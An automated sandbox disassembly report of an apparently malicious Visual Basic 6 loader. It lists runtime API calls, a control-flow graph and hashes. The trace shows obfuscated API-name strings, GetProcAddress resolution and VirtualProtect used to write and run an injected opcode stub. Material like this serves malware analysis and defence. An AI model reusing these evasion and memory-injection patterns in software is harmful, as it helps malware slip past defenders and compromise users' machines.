                    • Part of subcall function 004FDB76: __vbaVarDup.MSVBVM60(?,?,00000000), ref: 004FDBB9
                    • Part of subcall function 004FDB76: __vbaLenVar.MSVBVM60(?,?,?,?,00000000), ref: 004FDBC6
                    • Part of subcall function 004FDB76: __vbaI4Var.MSVBVM60(00000000,?,?,?,?,00000000), ref: 004FDBCC
                    • Part of subcall function 004FDB76: __vbaStrVarVal.MSVBVM60(?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDBFA
                    • Part of subcall function 004FDB76: #631.MSVBVM60(00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC00
                    • Part of subcall function 004FDB76: __vbaVarCat.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC1B
                    • Part of subcall function 004FDB76: __vbaVarMove.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC25
                    • Part of subcall function 004FDB76: __vbaFreeStr.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC2D
                    • Part of subcall function 004FDB76: __vbaFreeVarList.MSVBVM60(00000002,?,00000008,?,?,?,00000000,?,?,?,?,00000000,?,?,?,?), ref: 004FDC3B
                    • Part of subcall function 004FDB76: __vbaFreeVar.MSVBVM60(004FDC87,00000000,?,?,?,?,00000000), ref: 004FDC81
                  • __vbaStrVarVal.MSVBVM60(?,?,?), ref: 004FA0A6
                  • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 004FA0B0
                  • GetProcAddress.KERNEL32(00000000,?), ref: 004FA0BC
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 004FA0D0
                  • __vbaFreeVar.MSVBVM60(?,?,?), ref: 004FA0DB
                  • __vbaStrCat.MSVBVM60(0040BCD0,0040BCC8,?,?,?), ref: 004FA0EB
                  • __vbaStrMove.MSVBVM60(0040BCD0,0040BCC8,?,?,?), ref: 004FA0F5
                  • __vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA101
                  • __vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA10B
                  • __vbaStrCat.MSVBVM60(0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA116
                  • __vbaStrMove.MSVBVM60(0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA120
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA127
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA131
                  • __vbaStrCat.MSVBVM60(0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA13C
                  • __vbaStrMove.MSVBVM60(0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA146
                  • __vbaStrCat.MSVBVM60(0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA151
                  • __vbaStrMove.MSVBVM60(0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA15B
                  • __vbaStrCat.MSVBVM60(0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA166
                  • __vbaStrMove.MSVBVM60(0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA170
                  • #644.MSVBVM60(00000000,0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?), ref: 004FA176
                  • GetModuleHandleW.KERNEL32(00000000,00000000,0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8), ref: 004FA17C
                  • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?,00000000,00000000,0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000), ref: 004FA1A4
                  • __vbaStrCat.MSVBVM60(0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1B6
                  • __vbaStrMove.MSVBVM60(0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1C0
                  • __vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1C7
                  • __vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1D1
                  • __vbaStrCat.MSVBVM60(0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA1DD
                  • __vbaStrMove.MSVBVM60(0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA1E7
                  • __vbaStrCat.MSVBVM60(0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8), ref: 004FA1F2
                  • __vbaStrMove.MSVBVM60(0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8), ref: 004FA1FC
                  • __vbaStrCat.MSVBVM60(0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000), ref: 004FA207
                  • __vbaStrMove.MSVBVM60(0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000), ref: 004FA211
                  • __vbaStrCat.MSVBVM60(0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000), ref: 004FA21C
                  • __vbaStrMove.MSVBVM60(0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000), ref: 004FA226
                  • __vbaStrCat.MSVBVM60(0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000), ref: 004FA231
                  • __vbaStrMove.MSVBVM60(0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000), ref: 004FA23B
                  • __vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00), ref: 004FA242
                  • __vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00), ref: 004FA24C
                  • __vbaStrCat.MSVBVM60(0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000), ref: 004FA257
                  • __vbaStrMove.MSVBVM60(0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000), ref: 004FA261
                  • __vbaStrCat.MSVBVM60(0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000), ref: 004FA268
                  • __vbaStrMove.MSVBVM60(0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000), ref: 004FA272
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000), ref: 004FA27D
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000), ref: 004FA287
                  • __vbaStrCat.MSVBVM60(0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000), ref: 004FA292
                  • __vbaStrMove.MSVBVM60(0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000), ref: 004FA29C
                  • __vbaStrCat.MSVBVM60(0040BD10,00000000,0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000), ref: 004FA2A3
                  • __vbaStrMove.MSVBVM60(0040BD10,00000000,0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000), ref: 004FA2AD
                  • __vbaStrToAnsi.MSVBVM60(?,00000000,0040BD10,00000000,0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000), ref: 004FA2B7
                  • GetProcAddress.KERNEL32(00000000,?), ref: 004FA2C3
                  • __vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA307
                  • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,0000000E,?,?,?,?,?,?,?,?), ref: 004FA321
                  • __vbaNew.MSVBVM60(0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000), ref: 004FA333
                  • __vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000), ref: 004FA33D
                  • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8), ref: 004FA343
                  • __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28), ref: 004FA34D
                  • __vbaObjSetAddref.MSVBVM60(00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000), ref: 004FA359
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30), ref: 004FA368
                  • __vbaObjSetAddref.MSVBVM60(?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8), ref: 004FA37B
                  • #644.MSVBVM60(00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000), ref: 004FA381
                  • __vbaFreeObj.MSVBVM60(00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000), ref: 004FA38C
                  • #644.MSVBVM60(?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28), ref: 004FA395
                  • __vbaAryLock.MSVBVM60(?,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000), ref: 004FA3C1
                  • #644.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10), ref: 004FA3D6
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000), ref: 004FA3E5
                  • __vbaObjSetAddref.MSVBVM60(?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000), ref: 004FA418
                  • #644.MSVBVM60(00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10), ref: 004FA41E
                  • __vbaFreeObj.MSVBVM60(00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10), ref: 004FA429
                  • #644.MSVBVM60(005032CC,00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000), ref: 004FA437
                  • __vbaAryLock.MSVBVM60(?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0), ref: 004FA453
                  • #644.MSVBVM60(?,?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?,00000000,?), ref: 004FA467
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?,00000000), ref: 004FA476
                  • #644.MSVBVM60(?,?,?,?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?), ref: 004FA48E
                  • __vbaRedim.MSVBVM60(00000080,00000004,00503214,00000003,00000001,00000010,00000000,00000000,?,?,?,?,?,?,00000000,?), ref: 004FA4BF
                  • #644.MSVBVM60(?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30), ref: 004FA4CB
                  • #644.MSVBVM60(?,-0000000C,00000000,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000), ref: 004FA4F0
                  • __vbaAryLock.MSVBVM60(?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C), ref: 004FA51B
                  • __vbaStrCat.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?,00000000), ref: 004FA549
                  • __vbaStrMove.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?,00000000), ref: 004FA553
                  • __vbaI4Str.MSVBVM60(00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?), ref: 004FA559
                  • VirtualProtect.KERNELBASE(005032D0,00000000,00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?), ref: 004FA566
                  • __vbaHresultCheckObj.MSVBVM60(00000000,005032D0,0040BD6C,0000002C), ref: 004FA57F
                  • __vbaAryUnlock.MSVBVM60(?), ref: 004FA588
                  • __vbaFreeStr.MSVBVM60(?), ref: 004FA590
                  • #644.MSVBVM60(?,?), ref: 004FA599
                  • __vbaAryLock.MSVBVM60(?,00000000,-0000000C,?,?), ref: 004FA5D4
                  • #644.MSVBVM60(?,?,00000000,-0000000C,?,?), ref: 004FA5E9
                  • __vbaAryUnlock.MSVBVM60(?,?,?,00000000,-0000000C,?,?), ref: 004FA5F8
                  • #644.MSVBVM60(00000040,00000000,-0000000C,?,?), ref: 004FA62C
                  • #644.MSVBVM60(0424448B,?,00000000,00000004,00000040,00000000,-0000000C,?,?), ref: 004FA656
                  • #644.MSVBVM60(408B008B,?,00000000,00000004,0424448B,?,00000000,00000004,00000040,00000000,-0000000C,?,?), ref: 004FA680
                  • #644.MSVBVM60(20C4832C,?,00000000,00000004,408B008B,?,00000000,00000004,0424448B,?,00000000,00000004,00000040,00000000,-0000000C,?), ref: 004FA6AA
                  • #644.MSVBVM60(E02474FF,?,00000000,00000004,20C4832C,?,00000000,00000004,408B008B,?,00000000,00000004,0424448B,?,00000000,00000004), ref: 004FA6D4
                  • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000040,?,?,00000000,00000004,E02474FF,?,00000000), ref: 004FA729
                  • __vbaHresultCheckObj.MSVBVM60(00000000,005032D0,0040BD6C,00000020), ref: 004FA742
                  • __vbaAryLock.MSVBVM60(?), ref: 004FA766
                  • #644.MSVBVM60(?,?), ref: 004FA77A
                  • __vbaAryUnlock.MSVBVM60(?,?,?), ref: 004FA789
                  • #644.MSVBVM60(005032CC), ref: 004FA7AE
                  • #644.MSVBVM60(00000000,?,005032CC), ref: 004FA7C8
                  • #644.MSVBVM60(-00000004,00000000,00000000,?,005032CC), ref: 004FA7E2
                  • __vbaFreeVar.MSVBVM60(?,-00000004,00000000,-00000004,00000000,00000000,?,005032CC), ref: 004FA802
                  • __vbaAryDestruct.MSVBVM60(00000000,?,004FA87D,?,-00000004,00000000,-00000004,00000000,00000000,?,005032CC), ref: 004FA877
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Move$#644$Free$List$LockUnlock$Addref$AddressAnsiCheckHandleHresultModuleProcProtectRedimVirtual$#631CastDestructNofreeVarg
                  • String ID: @$DqlqlqFquqnqcqtqiqoqnqCqaqlqlq$bvm$!P
                  • API String ID: 3865120960-76275332
                  • Opcode ID: 1332d6ac0325587f3455eac6534a5f05f5ba20c1d3d93ede3bf419cd7a12755c
                  • Instruction ID: f61d177eecce2a4a06c9100171e70ccd984d061c79a0d37182c70c6426ca81cd
                  • Opcode Fuzzy Hash: 1332d6ac0325587f3455eac6534a5f05f5ba20c1d3d93ede3bf419cd7a12755c
                  • Instruction Fuzzy Hash: 3242DFB1D00118AADB15EFA5CC85EDEB7BCEF18304F14416EF505FB2A1DA389A05CB68

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 111 4fb547-4fb5ca __vbaObjSetAddref 113 4fb5df 111->113 114 4fb5cc-4fb5dd __vbaHresultCheckObj 111->114 115 4fb5e4-4fb5ea 113->115 114->115 116 4fbdf1-4fbe5b __vbaAryUnlock __vbaAryDestruct __vbaFreeObj * 2 __vbaAryDestruct __vbaFreeObj 115->116 117 4fb5f0-4fb6c0 __vbaObjSetAddref call 4fd499 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaFreeVar __vbaObjSetAddref call 4fd499 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaFreeVar 115->117 124 4fb6ce-4fb6f0 117->124 125 4fb6c2-4fb6c9 __vbaHresultCheckObj 117->125 127 4fb6fe-4fb715 124->127 128 4fb6f2-4fb6f9 __vbaHresultCheckObj 124->128 125->124 130 4fb717-4fb71e __vbaHresultCheckObj 127->130 131 4fb723-4fb7dc __vbaObjSetAddref call 4fd301 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref call 4fd301 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref call 4fd301 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj 127->131 128->127 130->131 139 4fb7de-4fb7e5 __vbaHresultCheckObj 131->139 140 4fb7ea-4fb801 131->140 139->140 142 4fb80f-4fb82c 140->142 143 4fb803-4fb80a __vbaHresultCheckObj 140->143 145 4fb82e-4fb835 __vbaHresultCheckObj 142->145 146 4fb83a-4fb851 142->146 143->142 145->146 148 4fb85f-4fb8a9 __vbaRedim __vbaAryLock 146->148 149 4fb853-4fb85a __vbaHresultCheckObj 146->149 151 4fb8ab-4fb8b2 __vbaHresultCheckObj 148->151 152 4fb8b7-4fb8c9 __vbaAryUnlock 148->152 149->148 151->152 153 4fb8cb-4fb8ed call 4fc18f 152->153 154 4fb8f3-4fb8fc 152->154 153->116 153->154 155 4fb8fe-4fb902 call 4fbef5 154->155 156 4fb910-4fb927 154->156 160 4fb907-4fb90a 155->160 162 4fb929-4fb930 __vbaHresultCheckObj 156->162 163 4fb935-4fb93a 156->163 160->116 160->156 162->163 164 4fba3b-4fba94 __vbaAryLock #644 __vbaAryUnlock call 4a78d5 call 4fef43 __vbaObjSet 163->164 165 4fb940-4fb945 163->165 176 4fba96-4fbaad __vbaRedim 164->176 177 4fbab0-4fbab4 164->177 165->164 166 4fb94b-4fb98b __vbaRedim __vbaAryLock 165->166 172 4fb98d-4fb994 __vbaHresultCheckObj 166->172 173 4fb999-4fb9ab __vbaAryUnlock 166->173 172->173 174 4fb9ad-4fb9cf call 4fc18f 173->174 175 4fb9d5-4fb9d8 173->175 174->116 174->175 180 4fb9ec-4fba36 __vbaAryLock #644 __vbaAryUnlock call 4a78d5 call 4fef43 __vbaObjSet 175->180 181 4fb9da-4fb9e6 call 4fbef5 175->181 176->177 179 4fbaba-4fbac3 177->179 183 4fbded 179->183 184 4fbac9-4fbaf3 __vbaAryLock 179->184 180->164 181->116 181->180 183->116 187 4fbaf9-4fbb10 184->187 188 4fbd52-4fbd69 184->188 195 4fbb1e-4fbb96 #698 #607 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList #644 187->195 196 4fbb12-4fbb19 __vbaHresultCheckObj 187->196 197 4fbd6b-4fbd72 __vbaHresultCheckObj 188->197 198 4fbd77-4fbd7b 188->198 202 4fbb98-4fbb9f __vbaHresultCheckObj 195->202 203 4fbba4-4fbbbb 195->203 196->195 197->198 199 4fbd7d-4fbdc0 __vbaRedim __vbaAryLock 198->199 200 4fbdd7-4fbde8 __vbaAryUnlock 198->200 205 4fbdce-4fbdd2 __vbaAryUnlock 199->205 206 4fbdc2-4fbdc5 199->206 200->179 202->203 209 4fbbbd-4fbbc4 __vbaHresultCheckObj 203->209 210 4fbbc9-4fbc2d #698 #606 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar #644 203->210 205->200 208 4fbdc8-4fbdc9 __vbaHresultCheckObj 206->208 208->205 209->210 212 4fbc2f-4fbc36 __vbaHresultCheckObj 210->212 213 4fbc3b-4fbc52 210->213 212->213 215 4fbc54-4fbc5b __vbaHresultCheckObj 213->215 216 4fbc60-4fbcc4 #698 #606 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar #644 213->216 215->216 218 4fbcc6-4fbccd __vbaHresultCheckObj 216->218 219 4fbcd2-4fbce9 216->219 218->219 221 4fbceb-4fbcf2 __vbaHresultCheckObj 219->221 222 4fbcf7-4fbcfb 219->222 221->222 222->200 223 4fbd01-4fbd44 __vbaRedim __vbaAryLock 222->223 223->205 225 4fbd4a-4fbd50 223->225 225->208
                  APIs
                  • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5AE
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB5D8
                  • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5F7
                  • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB613
                  • __vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB61D
                  • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 004FB62A
                  • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 004FB632
                  • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 004FB63A
                  • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 004FB642
                  • __vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 004FB64E
                  • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB66A
                  • __vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB674
                  • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB681
                  • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB689
                  • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB691
                  • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB699
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB6C9
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB6F9
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB71E
                  • __vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB72A
                  • __vbaStrMove.MSVBVM60(00000000,?,?), ref: 004FB73A
                  • __vbaStrCopy.MSVBVM60(00000000,?,?), ref: 004FB744
                  • __vbaFreeStr.MSVBVM60(00000000,?,?), ref: 004FB74C
                  • __vbaFreeObj.MSVBVM60(00000000,?,?), ref: 004FB754
                  • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 004FB760
                  • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB770
                  • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB77A
                  • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB782
                  • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB78A
                  • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?,00000000,?,?), ref: 004FB796
                  • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7A6
                  • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7B0
                  • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7B8
                  • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7C0
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB7E5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB80A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB835
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB85A
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004FB875
                  • __vbaAryLock.MSVBVM60(?,?), ref: 004FB884
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB8B2
                  • __vbaAryUnlock.MSVBVM60(?), ref: 004FB8BB
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB930
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004FB959
                  • __vbaAryLock.MSVBVM60(?,?), ref: 004FB968
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB994
